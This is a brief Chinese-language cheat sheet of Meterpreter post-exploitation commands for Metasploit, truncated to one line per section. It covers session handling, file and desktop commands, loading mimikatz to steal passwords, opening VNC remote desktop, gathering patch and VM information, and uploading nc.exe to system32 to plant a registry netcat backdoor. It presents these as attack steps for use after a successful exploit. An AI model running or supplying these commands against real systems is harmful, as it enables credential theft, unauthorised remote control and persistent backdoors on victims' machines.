前言
Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。Meterpreter功能强大,支持信息收集、提权、注册表操作、哈希利用、截屏录屏等操作,也支持对摄像头、录音设备、键盘鼠标的控制。
常用命令
1 | sessions -i 进入会话 |
文件系统命令
1 | cat 查看文件 |
用户设备命令
1 | enumdesktops 列出所有可访问的桌面和窗口 |
mimikatz抓取密码
1 | load mimikatz 加载mimikatz模块 |
开启远程桌面
1 | run vnc 使用vnc连接远程桌面 |
收集信息
1 | run post/windows/gather/checkvm #是否虚拟机 |
针对未安装补丁攻击
1 | run post/windows/gather/enum_patches 收集补丁信息 |
注册表设置nc后门
1 | upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 #上传nc |
参考资料
meterpreter help文件